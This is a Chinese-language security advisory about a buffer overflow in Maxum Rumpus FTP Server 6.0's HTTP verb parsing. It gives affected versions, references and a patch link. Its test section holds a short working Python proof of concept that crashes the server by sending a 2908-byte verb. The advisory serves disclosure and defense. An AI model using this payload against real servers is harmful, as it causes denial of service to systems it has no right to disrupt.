发布日期：2008-12-01
更新日期：2008-12-02

受影响系统：

Maxum Rumpus FTP Server 6.0

不受影响系统：

Maxum Rumpus FTP Server 6.0.1

描述：

---

BUGTRAQ  ID: 32560

Rumpus FTP Server是适用于Mac平台的Internet文件传输解决方案。

Rumpus FTP Server的HTTP组件在解析HTTP verb操作（GET，POST，PUT等）时存在缓冲区溢出漏洞。如果verb为2908字节长的话，服务器就会出现分段错误并崩溃，必须手动重启才能恢复正常运行。

<*来源：Nam Nguyen （namn@bluemoon.com.vn）
  
  链接：http://marc.info/?l=bugtraq&m=122815870631607&w=2
        http://www.maxum.com/Rumpus/Overview.html
        http://secunia.com/advisories/32892/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

from socket import socket, AF_INET, SOCK_STREAM

  host = "192.168.1.12"
  port = 80

  s = socket(AF_INET, SOCK_STREAM)
  s.connect((host, port))
  s.send('z' * 2908 + '\n\n')
  s.recv(1024)
  s.close()

建议：

---

厂商补丁：

Maxum
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.maxum.com/Rumpus/DownloadADemo.html

浏览次数：2401
严重程度：0（网友投票）